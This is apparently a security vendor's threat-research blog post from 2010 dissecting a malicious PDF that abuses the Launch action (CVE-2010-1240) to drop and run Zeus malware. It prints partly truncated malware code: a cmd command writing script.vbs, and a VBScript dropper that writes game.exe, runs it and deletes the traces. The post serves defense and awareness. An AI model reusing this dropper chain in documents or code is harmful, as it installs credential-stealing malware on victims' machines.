Threat Research

0day or not today: exploit in the wild

By Bin Liu | May 04, 2010

Although it is not a new idea to run an executable from within a PDF, the researcher Didier Stevens present a trick technique to make it more practical, "in the real world".

In this post I will dissect a PDF document using this trick (MD5: 1dcd4a3f5d05433fcebf88d9138a1966), indeed found in the wild. As one of vendors affected, Adobe was investigating this issue and give a temporary solution. But no patch is available yet. In fact there maybe no patch at all... and although CVE number CVE-2010-1240 is assigned for this issue, Some people think it is not a vulnerability, for it requires user interaction.

0day or not, and vulnerability or not, it is a threat either was - and Fortinet provided protection for the customer: "PDF/Pidief.BV!exploit" for AV and "PDF.With.Launch.Action" for IPS, each tackling the threat from a different angle for better resistance to threat variation. Since no patch is available from vendors like Adobe yet, it is also important for you to be aware of the form of this trick found in the wild.

The malicious PDF document source code looks like the following: PDF source

Following is what you will see when open this PDF with latest Adobe Reader (9.3.2). PDF look

When you click the button "Open", the following is executed:

_ /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject") > script.vbs [...Truncated...] && script.vbs && batscript.vbs_

This effectively drops, populates and executes a VB script called script.vbs, which final contents are the following:

_ Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.OpenTextFile("doc.pdf", 1, True) pf=f.ReadAll s=InStr(pf,"'SS") e=InStr(pf,"'EE") s=Mid(pf,s,e-s) Set z=fso.OpenTextFile("batscript.vbs", 2, True) s = Replace(s,"%","") z.Write(s)_

Basically, it merely extracts an embedded "batscript.vbs" in the PDF document and drops it in the current directory. This "batscript.vbs" contains the following:

_ Dim b Function c(d) c=chr(d) End Function b=Array(c(077),c(090),c(144),[Truncated] Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile("game.exe", 2, True) For i = 0 To 35328 f.write(b(i)) Next f.close() Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "cmd.exe /c game.exe" WScript.Sleep 3000 Set f = FSO.GetFile("game.exe") f.Delete Set f = FSO.GetFile("batscript.vbs") f.Delete Set f = FSO.GetFile("script.vbs") f.Delete_

This essentially drops a binary file called game.exe from an array of binary codes and runs it. In turn, game.exe downloads and installs an instance of the infamous Zeus Bot, whose main purpose is to steal (including using live interception) banking credentials and information.

All that from a simple user click. Consequently, if you happen to run into such a dialog when opening a PDF document, consider that there might be something rotten in the Kingdom of Denmark (or at least, in that document); and do not be too prompt to click "open".

Fortinet detect game.exe as W32/Agent.DJBN!tr and the Zeus bot instance as W32/Zbot.AISS!tr. A detailed analysis of the Zeus Botnet is avalaible on the Fortiguard Center.

Guillaume Lovet contributed to this post.

Join the Discussion